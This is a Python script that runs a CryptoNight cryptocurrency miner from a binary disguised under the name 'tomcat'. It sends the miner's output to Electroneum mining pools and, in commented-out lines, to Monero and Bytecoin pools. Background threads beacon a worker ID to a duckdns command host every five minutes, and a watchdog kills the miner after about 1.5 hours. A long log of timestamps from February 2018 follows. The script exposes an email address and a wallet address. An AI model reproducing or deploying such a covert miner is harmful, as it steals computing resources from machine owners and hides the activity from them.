import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:25:06.977863
#2018-02-17 17:13:02.232860
#2018-02-17 19:01:04.443043
#2018-02-17 20:48:07.769246
#2018-02-17 22:35:06.944558
#2018-02-18 00:19:04.689216
#2018-02-18 02:10:07.563368
#2018-02-18 03:58:04.962330
#2018-02-18 05:48:05.548125
#2018-02-18 07:38:06.208471
#2018-02-18 09:25:05.042428
#2018-02-18 11:11:04.032962
#2018-02-18 12:58:08.278576
#2018-02-18 14:47:03.335989
#2018-02-18 16:36:01.949195
#2018-02-18 18:24:07.123486
#2018-02-18 20:11:03.619676
#2018-02-18 21:57:05.279539
#2018-02-18 23:46:06.519765
#2018-02-19 01:34:01.373203
#2018-02-19 03:22:05.106891
#2018-02-19 05:07:06.786109
#2018-02-19 06:54:06.310058
#2018-02-19 08:42:03.479526
#2018-02-19 10:31:04.096518
#2018-02-19 12:18:08.272254
#2018-02-19 14:05:04.241687
#2018-02-19 15:53:08.180651
#2018-02-19 17:41:07.382330
#2018-02-19 19:30:04.535987
#2018-02-19 21:18:01.538399
#2018-02-19 23:03:07.715885
#2018-02-20 00:46:05.557669
#2018-02-20 02:35:01.696229
#2018-02-20 04:23:05.739861
#2018-02-20 06:07:04.561769
#2018-02-20 07:52:06.770381
#2018-02-20 09:37:06.831894
#2018-02-20 11:20:04.642843
#2018-02-20 13:06:09.447075
#2018-02-20 15:11:05.935492
#2018-02-20 16:56:06.488325
#2018-02-20 18:46:06.800047
#2018-02-20 20:38:03.852316
#2018-02-20 22:24:01.970415
#2018-02-21 00:22:01.716909
#2018-02-21 02:07:05.628034
#2018-02-21 03:55:03.008643
#2018-02-21 05:42:04.328111
#2018-02-21 07:30:06.201465
#2018-02-21 09:15:02.092069
#2018-02-21 11:03:01.908723
#2018-02-21 12:51:06.150573
#2018-02-21 14:39:06.698122
#2018-02-21 16:27:04.590291
#2018-02-21 18:17:01.931193
#2018-02-21 20:02:06.294091
#2018-02-21 21:48:05.288183
#2018-02-21 23:35:06.946023
#2018-02-22 01:23:06.102868
#2018-02-22 03:11:06.188627
#2018-02-22 04:57:06.684186
#2018-02-22 06:40:09.199560
#2018-02-22 08:29:04.600108
#2018-02-22 10:16:01.565221
#2018-02-22 12:01:01.362210
#2018-02-22 13:46:07.021941
#2018-02-22 15:36:01.662365
#2018-02-22 17:22:01.459856
#2018-02-22 19:08:08.628209
#2018-02-22 20:59:06.802033
#2018-02-22 22:45:01.779945
#2018-02-23 00:32:08.214205
#2018-02-23 02:17:08.354574
#2018-02-23 04:11:05.576675
#2018-02-23 05:55:06.556632
#2018-02-23 07:34:06.454334
#2018-02-23 09:37:04.399626
#2018-02-23 11:42:08.489667
#2018-02-23 13:33:05.221519
#2018-02-23 15:18:07.639868
#2018-02-23 17:07:04.622546
#2018-02-23 18:36:07.480662
#2018-02-23 20:16:06.213472
#2018-02-23 21:54:04.299956
#2018-02-23 23:27:05.771968
#2018-02-24 01:06:01.912504
#2018-02-24 02:47:06.067362
#2018-02-24 04:23:05.555014
#2018-02-24 05:51:06.883238
#2018-02-24 07:26:07.205587
#2018-02-24 09:00:01.666947
#2018-02-24 10:46:03.706230
#2018-02-24 12:33:01.748029
#2018-02-24 14:22:03.738531
#2018-02-24 16:09:05.292769
#2018-02-24 18:00:05.137624
#2018-02-24 19:48:02.149777
#2018-02-24 22:53:06.092599
#2018-02-25 03:02:05.868452
#2018-02-25 06:45:06.906172